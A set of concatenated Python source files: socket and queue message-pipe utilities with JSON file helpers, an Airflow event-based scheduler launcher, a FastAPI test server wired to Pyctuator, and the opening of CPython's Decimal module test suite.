        # Return the next decoded JSON message; raises `timeout` when no
        # complete message arrives in time; returns None on remote close.
        while True:
            response, self.message = parse_json(self.message)
            if response is not None:
                return response
            try:
                data = self.socket.recv(1024)
            except socket.timeout:
                raise timeout
            except ssl.SSLError:
                raise timeout
            except socket.error as err:
                if err.errno == 60:
                    # NOTE(review): presumably ETIMEDOUT (BSD/macOS errno
                    # numbering) -- confirm; treated like a timeout
                    raise timeout
                elif err.errno in [11, 35, 10035]:
                    # EAGAIN/EWOULDBLOCK (linux/bsd/windows): back off briefly
                    print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
                    time.sleep(0.2)
                    raise timeout
                else:
                    print_error("pipe: socket error", err)
                    data = b''
            except:
                traceback.print_exc(file=sys.stderr)
                data = b''
            if not data: # Connection closed remotely
                return None
            self.message += data
            self.recv_time = time.time()

    def send(self, request):
        # one JSON object per line
        out = json.dumps(request) + '\n'
        out = out.encode('utf8')
        self._send(out)

    def send_all(self, requests):
        out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
        self._send(out)

    def _send(self, out):
        # keep writing until the whole buffer is flushed; transient SSL
        # errors are retried after a short pause
        while out:
            try:
                sent = self.socket.send(out)
                out = out[sent:]
            except ssl.SSLError as e:
                print_error("SSLError:", e)
                time.sleep(0.1)
                continue
class QueuePipe:
    """In-process pipe with the same get/send interface as SocketPipe,
    backed by a pair of queues."""

    def __init__(self, send_queue=None, get_queue=None):
        self.send_queue = send_queue if send_queue else queue.Queue()
        self.get_queue = get_queue if get_queue else queue.Queue()
        self.set_timeout(0.1)

    def get(self):
        """Next incoming message; raises `timeout` when none arrives in time."""
        try:
            return self.get_queue.get(timeout=self.timeout)
        except queue.Empty:
            raise timeout

    def get_all(self):
        """Drain and return every currently-queued message (may be empty)."""
        drained = []
        while True:
            try:
                drained.append(self.get_queue.get_nowait())
            except queue.Empty:
                return drained

    def set_timeout(self, t):
        self.timeout = t

    def send(self, request):
        self.send_queue.put(request)

    def send_all(self, requests):
        for request in requests:
            self.send(request)
def setup_thread_excepthook():
    """
    Workaround for `sys.excepthook` thread bug from:
    http://bugs.python.org/issue1230540
    Call once from the main thread before creating any threads.
    """
    init_original = threading.Thread.__init__

    def init(self, *args, **kwargs):
        init_original(self, *args, **kwargs)
        run_original = self.run

        def run_with_except_hook(*args2, **kwargs2):
            try:
                run_original(*args2, **kwargs2)
            except Exception:
                # route uncaught thread exceptions through sys.excepthook,
                # which plain threads would otherwise bypass
                sys.excepthook(*sys.exc_info())

        # wrap this instance's run() so exceptions hit the hook
        self.run = run_with_except_hook

    # monkey-patch Thread.__init__ so every future thread is wrapped
    threading.Thread.__init__ = init
def versiontuple(v):
    """'1.2.3' -> (1, 2, 3)"""
    return tuple(int(part) for part in v.split("."))
def import_meta(path, validater, load_meta):
    """Read JSON from `path`, validate it with validater(), then hand the
    result to load_meta().  All failures are wrapped in FileImportFailed.
    """
    try:
        with open(path, 'r', encoding='utf-8') as f:
            d = validater(json.loads(f.read()))
        load_meta(d)
    #backwards compatibility for JSONDecodeError
    except ValueError:
        traceback.print_exc(file=sys.stderr)
        raise FileImportFailed(_("Invalid JSON code."))
    except BaseException as e:
        # fix: this traceback previously went to sys.stdout, unlike every
        # other handler in this module; send it to stderr for consistency
        traceback.print_exc(file=sys.stderr)
        raise FileImportFailed(e)
def export_meta(meta, fileName):
    """Write `meta` as pretty-printed, key-sorted JSON to fileName.
    Raises FileExportFailed on I/O errors."""
    try:
        with open(fileName, 'w+', encoding='utf-8') as fp:
            json.dump(meta, fp, sort_keys=True, indent=4)
    except (IOError, os.error) as e:
        traceback.print_exc(file=sys.stderr)
        raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
    """Make directory if it does not yet exist.

    Created directories get mode 0700.  With allow_symlink=False a
    dangling symlink at *path* (exists() is False for those) is rejected
    rather than followed into os.mkdir.
    """
    if os.path.exists(path):
        return
    if not allow_symlink and os.path.islink(path):
        raise Exception('Dangling link: ' + path)
    os.mkdir(path)
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
airflow_scheduler_utils.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import signal
import threading
import time
import os
import logging
import multiprocessing as mp
from subprocess import Popen
from ai_flow.plugin_interface.scheduler_interface import WorkflowExecutionInfo
from airflow.contrib.jobs.event_based_scheduler_job import EventBasedSchedulerJob
from airflow.events.scheduler_events import StopSchedulerEvent
from airflow.executors.local_executor import LocalExecutor
from typing import Callable
from notification_service.client import NotificationClient
def start_scheduler(file_path, port=50051, executor=None):
    """Run an event-based Airflow scheduler over the DAGs in *file_path*
    (blocking), talking to the notification server on localhost:*port*.

    Falls back to a LocalExecutor with 15 slots when no executor is given.
    """
    if executor is None:
        executor = LocalExecutor(15)
    job = EventBasedSchedulerJob(dag_directory=file_path,
                                 server_uri="localhost:{}".format(port),
                                 executor=executor,
                                 max_runs=-1,
                                 refresh_dag_dir_interval=30)
    print("scheduler starting")
    job.run()
def start_airflow_scheduler_server(file_path, port=50051) -> mp.Process:
    """Launch start_scheduler() in a separate 'spawn' process.

    Uses mp.get_context('spawn') rather than mp.set_start_method('spawn'):
    set_start_method mutates interpreter-global state and raises
    RuntimeError when the start method has already been set (e.g. on a
    second call, or when the host application configured multiprocessing
    itself), so this function was previously not re-entrant.

    :param file_path: DAG directory handed through to start_scheduler.
    :param port: notification server port (default 50051).
    :return: the already-started process handle.
    """
    ctx = mp.get_context('spawn')
    process = ctx.Process(target=start_scheduler, args=(file_path, port))
    process.start()
    return process
def start_airflow_web_server() -> Popen:
    """Start `airflow webserver -p 8080` as a child process.

    stdout/stderr go to ./web.log (truncated on each start); returns the
    Popen handle immediately without waiting for the server to be ready.
    """
    def pre_exec():
        # Restore default signal disposition and invoke setsid
        for sig in ('SIGPIPE', 'SIGXFZ', 'SIGXFSZ'):
            if hasattr(signal, sig):
                signal.signal(getattr(signal, sig), signal.SIG_DFL)
        # New session: detach the webserver from our controlling terminal.
        os.setsid()
    env = os.environ.copy()
    stdout_log = './web.log'
    # The log file object is closed here once Popen has duplicated its fd,
    # so the child keeps writing to it after the `with` block exits.
    with open(stdout_log, 'w') as out:
        sub_process = Popen(  # pylint: disable=subprocess-popen-preexec-fn
            'airflow webserver -p 8080',
            stdout=out,
            stderr=out,
            env=env,
            shell=True,
            preexec_fn=pre_exec,
        )
    logging.info('Process pid: %s', sub_process.pid)
    return sub_process
def run_ai_flow_workflow(dag_id, test_function: Callable[[NotificationClient], None], port=50051, executor=None):
    """Run *test_function* against a freshly started event-based scheduler.

    A daemon thread waits 5 seconds for the scheduler to come up, invokes
    the test with a NotificationClient, and always sends a
    StopSchedulerEvent so the blocking start_scheduler() call below
    terminates even when the test raises.

    :param dag_id: DAG id; resolved to /tmp/airflow/<dag_id>.py.
    :param test_function: callback receiving the NotificationClient.
    :param port: notification server port (default 50051).
    :param executor: optional executor forwarded to start_scheduler.
    """
    def run_test_fun():
        time.sleep(5)
        client = NotificationClient(server_uri="localhost:{}".format(port),
                                    default_namespace="test")
        # The previous `except Exception as e: raise e` was a no-op re-raise
        # that only truncated the traceback; `finally` alone is sufficient.
        try:
            test_function(client)
        finally:
            # Stop the scheduler even if the test raised.
            client.send_event(StopSchedulerEvent(job_id=0).to_event())
    t = threading.Thread(target=run_test_fun, args=())
    # Thread.setDaemon() is deprecated since Python 3.10; set the attribute.
    t.daemon = True
    t.start()
    dag_file = '/tmp/airflow/' + dag_id + '.py'
    start_scheduler(file_path=dag_file, port=port, executor=executor)
def get_dag_id(namespace, workflow_name):
    """Compose the Airflow DAG id as "<namespace>.<workflow_name>"."""
    return f'{namespace}.{workflow_name}'
class WorkflowExecutionWrapper(object):
    """Mutable holder for the most recent WorkflowExecutionInfo.

    A single module-level instance (``workflow_wrapper``) is used as shared
    state by set_workflow_execution_info()/get_workflow_execution_info().
    """
    def __init__(self):
        # No execution info until set_workflow_execution_info() records one.
        self.workflow_execution_info: WorkflowExecutionInfo = None
# Single module-wide holder shared by the setter/getter below.
workflow_wrapper = WorkflowExecutionWrapper()


def set_workflow_execution_info(workflow_execution_info: WorkflowExecutionInfo):
    """Record the latest workflow execution info in the shared wrapper."""
    # Attribute assignment on a module-level object needs no `global`.
    workflow_wrapper.workflow_execution_info = workflow_execution_info


def get_workflow_execution_info() -> WorkflowExecutionInfo:
    """Return the most recently recorded execution info (None initially)."""
    return workflow_wrapper.workflow_execution_info
|
fast_api_test_server.py | import logging
import threading
import time
from typing import Optional
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import Response
from uvicorn.config import Config
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer, CustomServer
class FastApiPyctuatorServer(PyctuatorServer):
    """Test harness: a FastAPI app instrumented with Pyctuator, served by
    uvicorn on a background thread via start()/stop()."""
    def __init__(self) -> None:
        self.app = FastAPI(
            title="FastAPI Example Server",
            description="Demonstrate Spring Boot Admin Integration with FastAPI",
            docs_url="/api",
        )
        # Register this app with the (test) Spring Boot Admin server.
        # NOTE(review): self.metadata / self.additional_app_info presumably
        # come from the PyctuatorServer base class -- confirm in conftest.
        self.pyctuator = Pyctuator(
            self.app,
            "FastAPI Pyctuator",
            "http://localhost:8000",
            "http://localhost:8000/pyctuator",
            "http://localhost:8001/register",
            registration_interval_sec=1,
            metadata=self.metadata,
            additional_app_info=self.additional_app_info,
        )

        # Test endpoint: logs the given string so the logfile API can be
        # asserted against.
        @self.app.get("/logfile_test_repeater", tags=["pyctuator"])
        # pylint: disable=unused-variable
        def logfile_test_repeater(repeated_string: str) -> str:
            logging.error(repeated_string)
            return repeated_string

        self.server = CustomServer(config=(Config(app=self.app, loop="asyncio")))
        self.thread = threading.Thread(target=self.server.run)

        @self.app.get("/httptrace_test_url")
        # pylint: disable=unused-variable
        def get_httptrace_test_url(request: Request, sleep_sec: Optional[int]) -> Response:
            # Sleep if requested to sleep - used for asserting httptraces timing
            if sleep_sec:
                logging.info("Sleeping %s seconds before replying", sleep_sec)
                time.sleep(sleep_sec)
            # Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
            headers = {
                "resp-data": str(request.headers.get("User-Data")),
                "response-secret": "my password"
            }
            return Response(headers=headers, content="my content")

    def start(self) -> None:
        """Run uvicorn on its thread and block until it reports started."""
        self.thread.start()
        while not self.server.started:
            time.sleep(0.01)

    def stop(self) -> None:
        """Shut the server down and join its thread."""
        logging.info("Stopping FastAPI server")
        self.pyctuator.stop()
        # Allow the recurring registration to complete any in-progress request before stopping FastAPI
        time.sleep(1)
        self.server.should_exit = True
        self.server.force_exit = True
        self.thread.join()
        logging.info("FastAPI server stopped")

    def atexit(self) -> None:
        # Best-effort deregistration from the admin server at interpreter exit.
        if self.pyctuator.boot_admin_registration_handler:
            self.pyctuator.boot_admin_registration_handler.deregister_from_admin_server()
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings,
requires_legacy_unicode_capi)
from test.support import (TestFailed,
run_with_locale, cpython_only)
from test.support.import_helper import import_fresh_module
from test.support import warnings_helper
import random
import inspect
import threading
# Import the decimal module twice: C is the _decimal accelerator (may be
# unavailable on some builds, hence the `if C else None` guards below),
# P is the pure-Python implementation.
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']

# fractions module must import the correct decimal module.
# Temporarily swap sys.modules['decimal'] so each fresh fractions import
# binds to the matching implementation, then restore the original.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal

# Useful Test Constant
Signals = {
  C: tuple(C.getcontext().flags.keys()) if C else None,
  P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
  C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
      C.Overflow, C.DivisionByZero, C.InvalidOperation,
      C.FloatOperation] if C else None,
  P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
      P.Overflow, P.DivisionByZero, P.InvalidOperation,
      P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
    """Assert via *cls* that exactly the signals in *expected* are set in
    the mapping ``getattr(context, attr)`` and all others are clear."""
    flags = getattr(context, attr)
    cls.assertTrue(all(flags[sig] if sig in expected else not flags[sig]
                       for sig in flags))
# Shorthand aliases for the rounding-mode constants (taken from the
# pure-Python module; the C module exposes identical string values).
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP

# All rounding modes, for tests that iterate over every mode.
RoundingModes = [
  ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
  ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
  ROUND_05UP
]

# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
  C: C.getcontext().copy() if C else None,
  P: P.getcontext().copy()
}
def init(m):
    """Install the default test context (prec 9, half-even rounding, all
    traps disabled) into decimal module *m*; no-op when *m* is None."""
    if not m:
        return
    default_ctx = m.Context(prec=9,
                            rounding=ROUND_HALF_EVEN,
                            traps=dict.fromkeys(Signals[m], 0))
    m.setcontext(default_ctx)
TESTDATADIR = 'decimaltestdata'
# Locate the test-data directory relative to this file (argv[0] when the
# module is run as a script); IBM tests are skipped if it is missing.
if __name__ == '__main__':
    file = sys.argv[0]
else:
    file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)

# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False

# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
  EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
  EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
    """Class which tests the Decimal class against the IBM test cases.

    Subclasses set ``decimal`` to either the C or the pure-Python module;
    eval_file()/eval_line() drive the .decTest files through eval_directive()
    and eval_equation().
    """
    def setUp(self):
        # Fresh contexts per test: one for running operations, one for
        # reading operands with (nearly) unlimited precision.
        self.context = self.decimal.Context()
        self.readcontext = self.decimal.Context()
        self.ignore_list = ['#']

        # List of individual .decTest test ids that correspond to tests that
        # we're skipping for one reason or another.
        self.skipped_test_ids = set([
            # Skip implementation-specific scaleb tests.
            'scbx164',
            'scbx165',

            # For some operations (currently exp, ln, log10, power), the decNumber
            # reference implementation imposes additional restrictions on the context
            # and operands.  These restrictions are not part of the specification;
            # however, the effect of these restrictions does show up in some of the
            # testcases.  We skip testcases that violate these restrictions, since
            # Decimal behaves differently from decNumber for these testcases so these
            # testcases would otherwise fail.
            'expx901',
            'expx902',
            'expx903',
            'expx905',
            'lnx901',
            'lnx902',
            'lnx903',
            'lnx905',
            'logx901',
            'logx902',
            'logx903',
            'logx905',
            'powx1183',
            'powx1184',
            'powx4001',
            'powx4002',
            'powx4003',
            'powx4005',
            'powx4008',
            'powx4010',
            'powx4012',
            'powx4014',
            ])

        if self.decimal == C:
            # status has additional Subnormal, Underflow
            self.skipped_test_ids.add('pwsx803')
            self.skipped_test_ids.add('pwsx805')
            # Correct rounding (skipped for decNumber, too)
            self.skipped_test_ids.add('powx4302')
            self.skipped_test_ids.add('powx4303')
            self.skipped_test_ids.add('powx4342')
            self.skipped_test_ids.add('powx4343')
            # http://bugs.python.org/issue7049
            self.skipped_test_ids.add('pwmx325')
            self.skipped_test_ids.add('pwmx326')

        # Map test directives to setter functions.
        self.ChangeDict = {'precision' : self.change_precision,
                           'rounding' : self.change_rounding_method,
                           'maxexponent' : self.change_max_exponent,
                           'minexponent' : self.change_min_exponent,
                           'clamp' : self.change_clamp}

        # Name adapter to be able to change the Decimal and Context
        # interface without changing the test files from Cowlishaw.
        self.NameAdapter = {'and':'logical_and',
                            'apply':'_apply',
                            'class':'number_class',
                            'comparesig':'compare_signal',
                            'comparetotal':'compare_total',
                            'comparetotmag':'compare_total_mag',
                            'copy':'copy_decimal',
                            'copyabs':'copy_abs',
                            'copynegate':'copy_negate',
                            'copysign':'copy_sign',
                            'divideint':'divide_int',
                            'invert':'logical_invert',
                            'iscanonical':'is_canonical',
                            'isfinite':'is_finite',
                            'isinfinite':'is_infinite',
                            'isnan':'is_nan',
                            'isnormal':'is_normal',
                            'isqnan':'is_qnan',
                            'issigned':'is_signed',
                            'issnan':'is_snan',
                            'issubnormal':'is_subnormal',
                            'iszero':'is_zero',
                            'maxmag':'max_mag',
                            'minmag':'min_mag',
                            'nextminus':'next_minus',
                            'nextplus':'next_plus',
                            'nexttoward':'next_toward',
                            'or':'logical_or',
                            'reduce':'normalize',
                            'remaindernear':'remainder_near',
                            'samequantum':'same_quantum',
                            'squareroot':'sqrt',
                            'toeng':'to_eng_string',
                            'tointegral':'to_integral_value',
                            'tointegralx':'to_integral_exact',
                            'tosci':'to_sci_string',
                            'xor':'logical_xor'}

        # Map test-case names to roundings.
        self.RoundingDict = {'ceiling' : ROUND_CEILING,
                             'down' : ROUND_DOWN,
                             'floor' : ROUND_FLOOR,
                             'half_down' : ROUND_HALF_DOWN,
                             'half_even' : ROUND_HALF_EVEN,
                             'half_up' : ROUND_HALF_UP,
                             'up' : ROUND_UP,
                             '05up' : ROUND_05UP}

        # Map the test cases' error names to the actual errors.
        self.ErrorNames = {'clamped' : self.decimal.Clamped,
                           'conversion_syntax' : self.decimal.InvalidOperation,
                           'division_by_zero' : self.decimal.DivisionByZero,
                           'division_impossible' : self.decimal.InvalidOperation,
                           'division_undefined' : self.decimal.InvalidOperation,
                           'inexact' : self.decimal.Inexact,
                           'invalid_context' : self.decimal.InvalidOperation,
                           'invalid_operation' : self.decimal.InvalidOperation,
                           'overflow' : self.decimal.Overflow,
                           'rounded' : self.decimal.Rounded,
                           'subnormal' : self.decimal.Subnormal,
                           'underflow' : self.decimal.Underflow}

        # The following functions return True/False rather than a
        # Decimal instance.
        self.LogicalFunctions = ('is_canonical',
                                 'is_finite',
                                 'is_infinite',
                                 'is_nan',
                                 'is_normal',
                                 'is_qnan',
                                 'is_signed',
                                 'is_snan',
                                 'is_subnormal',
                                 'is_zero',
                                 'same_quantum')

    def read_unlimited(self, v, context):
        """Work around the limitations of the 32-bit _decimal version. The
        guaranteed maximum values for prec, Emax etc. are 425000000,
        but higher values usually work, except for rare corner cases.
        In particular, all of the IBM tests pass with maximum values
        of 1070000000."""
        if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
            self.readcontext._unsafe_setprec(1070000000)
            self.readcontext._unsafe_setemax(1070000000)
            self.readcontext._unsafe_setemin(-1070000000)
            return self.readcontext.create_decimal(v)
        else:
            return self.decimal.Decimal(v, context)

    def eval_file(self, file):
        """Evaluate every line of a .decTest file; fail the test when a
        DecimalException escapes eval_line()."""
        global skip_expected
        if skip_expected:
            raise unittest.SkipTest
        with open(file) as f:
            for line in f:
                line = line.replace('\r\n', '').replace('\n', '')
                #print line
                try:
                    t = self.eval_line(line)
                except self.decimal.DecimalException as exception:
                    #Exception raised where there shouldn't have been one.
                    self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)

    def eval_line(self, s):
        """Strip comments from line *s* and dispatch it to eval_directive()
        (contains ':') or eval_equation() (contains '->')."""
        if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith('  --'):
            s = (s.split('->')[0] + '->' +
                 s.split('->')[1].split('--')[0]).strip()
        else:
            s = s.split('--')[0].strip()

        for ignore in self.ignore_list:
            if s.find(ignore) >= 0:
                #print s.split()[0], 'NotImplemented--', ignore
                return
        if not s:
            return
        elif ':' in s:
            return self.eval_directive(s)
        else:
            return self.eval_equation(s)

    def eval_directive(self, s):
        """Apply a 'name: value' context directive via ChangeDict."""
        funct, value = (x.strip().lower() for x in s.split(':'))
        if funct == 'rounding':
            value = self.RoundingDict[value]
        else:
            try:
                value = int(value)
            except ValueError:
                pass
        # Unknown directives are silently ignored (no-op lambda).
        funct = self.ChangeDict.get(funct, (lambda *args: None))
        funct(value)

    def eval_equation(self, s):
        """Run one 'id funct operands -> answer flags' test equation and
        check both the result and the raised/flagged signals.

        NOTE(review): TEST_ALL and DEBUG are module globals defined outside
        this chunk.
        """
        if not TEST_ALL and random.random() < 0.90:
            return
        self.context.clear_flags()

        try:
            Sides = s.split('->')
            L = Sides[0].strip().split()
            id = L[0]
            if DEBUG:
                print("Test ", id, end=" ")
            funct = L[1].lower()
            valstemp = L[2:]
            L = Sides[1].strip().split()
            ans = L[0]
            exceptions = L[1:]
        except (TypeError, AttributeError, IndexError):
            raise self.decimal.InvalidOperation
        def FixQuotes(val):
            val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
            val = val.replace("'", '').replace('"', '')
            val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
            return val

        if id in self.skipped_test_ids:
            return

        fname = self.NameAdapter.get(funct, funct)
        if fname == 'rescale':
            return
        funct = getattr(self.context, fname)
        vals = []
        conglomerate = ''
        quote = 0
        theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]

        for exception in Signals[self.decimal]:
            self.context.traps[exception] = 1 #Catch these bugs...
        for exception in theirexceptions:
            self.context.traps[exception] = 0
        # Re-assemble quoted operands that were split on whitespace.
        for i, val in enumerate(valstemp):
            if val.count("'") % 2 == 1:
                quote = 1 - quote
            if quote:
                conglomerate = conglomerate + ' ' + val
                continue
            else:
                val = conglomerate + val
                conglomerate = ''
            v = FixQuotes(val)
            if fname in ('to_sci_string', 'to_eng_string'):
                if EXTENDEDERRORTEST:
                    for error in theirexceptions:
                        self.context.traps[error] = 1
                        try:
                            funct(self.context.create_decimal(v))
                        except error:
                            pass
                        except Signals[self.decimal] as e:
                            self.fail("Raised %s in %s when %s disabled" % \
                                      (e, s, error))
                        else:
                            self.fail("Did not raise %s in %s" % (error, s))
                        self.context.traps[error] = 0
                v = self.context.create_decimal(v)
            else:
                v = self.read_unlimited(v, self.context)
            vals.append(v)

        ans = FixQuotes(ans)

        if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
            for error in theirexceptions:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s when %s disabled" % \
                              (e, s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
                self.context.traps[error] = 0

            # as above, but add traps cumulatively, to check precedence
            ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
            for error in ordered_errors:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
                except Signals[self.decimal] as e:
                    self.fail("Raised %s in %s; expected %s" %
                              (type(e), s, error))
                else:
                    self.fail("Did not raise %s in %s" % (error, s))
            # reset traps
            for error in ordered_errors:
                self.context.traps[error] = 0

        if DEBUG:
            print("--", self.context)
        try:
            result = str(funct(*vals))
            if fname in self.LogicalFunctions:
                result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
        except Signals[self.decimal] as error:
            self.fail("Raised %s in %s" % (error, s))
        except: #Catch any error long enough to state the test case.
            print("ERROR:", s)
            raise

        myexceptions = self.getexceptions()

        myexceptions.sort(key=repr)
        theirexceptions.sort(key=repr)

        self.assertEqual(result, ans,
                         'Incorrect answer for ' + s + ' -- got ' + result)

        self.assertEqual(myexceptions, theirexceptions,
                         'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))

    def getexceptions(self):
        """Return the list of signals currently flagged on self.context."""
        return [e for e in Signals[self.decimal] if self.context.flags[e]]

    def change_precision(self, prec):
        # 32-bit C builds need the unsafe setter for huge precisions.
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setprec(prec)
        else:
            self.context.prec = prec
    def change_rounding_method(self, rounding):
        self.context.rounding = rounding
    def change_min_exponent(self, exp):
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemin(exp)
        else:
            self.context.Emin = exp
    def change_max_exponent(self, exp):
        if self.decimal == C and self.decimal.MAX_PREC == 425000000:
            self.context._unsafe_setemax(exp)
        else:
            self.context.Emax = exp
    def change_clamp(self, clamp):
        self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the C accelerator module.
    decimal = C
class PyIBMTestCases(IBMTestCases):
    # Run the IBM test cases against the pure-Python module.
    decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Explicit Construction cases of Decimal.

    Subclasses bind ``decimal`` to the C or the pure-Python module.
    '''

    def test_explicit_empty(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(), Decimal("0"))

    def test_explicit_from_None(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, Decimal, None)

    def test_explicit_from_int(self):
        Decimal = self.decimal.Decimal

        #positive
        d = Decimal(45)
        self.assertEqual(str(d), '45')

        #very large positive
        d = Decimal(500000123)
        self.assertEqual(str(d), '500000123')

        #negative
        d = Decimal(-45)
        self.assertEqual(str(d), '-45')

        #zero
        d = Decimal(0)
        self.assertEqual(str(d), '0')

        # single word longs
        for n in range(0, 32):
            for sign in (-1, 1):
                for x in range(-5, 5):
                    i = sign * (2**n + x)
                    d = Decimal(i)
                    self.assertEqual(str(d), str(i))

    def test_explicit_from_string(self):
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        localcontext = self.decimal.localcontext

        #empty
        self.assertEqual(str(Decimal('')), 'NaN')

        #int
        self.assertEqual(str(Decimal('45')), '45')

        #float
        self.assertEqual(str(Decimal('45.34')), '45.34')

        #engineer notation
        self.assertEqual(str(Decimal('45e2')), '4.5E+3')

        #just not a number
        self.assertEqual(str(Decimal('ugly')), 'NaN')

        #leading and trailing whitespace permitted
        self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
        self.assertEqual(str(Decimal('  -7.89')), '-7.89')
        self.assertEqual(str(Decimal("  3.45679  ")), '3.45679')

        # underscores
        self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
        self.assertEqual(str(Decimal('1_0_0_0')), '1000')

        # unicode whitespace
        for lead in ["", ' ', '\u00a0', '\u205f']:
            for trail in ["", ' ', '\u00a0', '\u205f']:
                self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
                                 '9.311E+28')

        with localcontext() as c:
            c.traps[InvalidOperation] = True
            # Invalid string
            self.assertRaises(InvalidOperation, Decimal, "xyz")
            # Two arguments max
            self.assertRaises(TypeError, Decimal, "1234", "x", "y")

            # space within the numeric part
            self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
            self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")

            # unicode whitespace
            self.assertRaises(InvalidOperation, Decimal, "\u00a0")
            self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")

            # embedded NUL
            self.assertRaises(InvalidOperation, Decimal, "12\u00003")

            # underscores don't prevent errors
            self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")

    @cpython_only
    @requires_legacy_unicode_capi
    @warnings_helper.ignore_warnings(category=DeprecationWarning)
    def test_from_legacy_strings(self):
        import _testcapi
        Decimal = self.decimal.Decimal
        context = self.decimal.Context()

        s = _testcapi.unicode_legacy_string('9.999999')
        self.assertEqual(str(Decimal(s)), '9.999999')
        self.assertEqual(str(context.create_decimal(s)), '9.999999')

    def test_explicit_from_tuples(self):
        Decimal = self.decimal.Decimal

        #zero
        d = Decimal( (0, (0,), 0) )
        self.assertEqual(str(d), '0')

        #int
        d = Decimal( (1, (4, 5), 0) )
        self.assertEqual(str(d), '-45')

        #float
